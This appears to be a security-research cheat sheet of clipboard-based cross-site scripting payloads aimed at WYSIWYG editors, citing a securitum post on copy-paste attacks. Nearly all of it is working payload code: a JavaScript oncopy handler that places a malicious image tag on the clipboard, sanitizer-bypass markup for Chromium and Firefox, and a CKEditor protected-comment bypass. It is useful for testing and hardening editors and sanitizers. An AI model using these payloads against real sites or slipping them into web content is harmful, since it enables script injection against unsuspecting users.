WYSIWYG XSS Payloads

Post

https://research.securitum.com/the-curious-case-of-copy-paste/

Payloads

Clipboard basic

document.oncopy = event => {
  event.preventDefault();
  event.clipboardData.setData('text/html', '<img src onerror=alert(1)>');
}

Chromium

(start)
a<math>b<xss style=display:block>c<style>d<a title="</style><img src onerror=alert(1)>">e
(end)

Copy me=> (start) ab<xss style=display:block;>c

Firefox

(start)
<style>
@import''; 
@font-face { font-family: 'ab<\/style><img src onerror=alert(1)>'}
</style>
(end)

Copy me => (start)

(end)

CKEditor

(start)
A<!--{ce_protected}{C}%3C!%2D%2D%20comment%20%2D%2D%3E-->B
(end)

Copy me => (start) AB (end)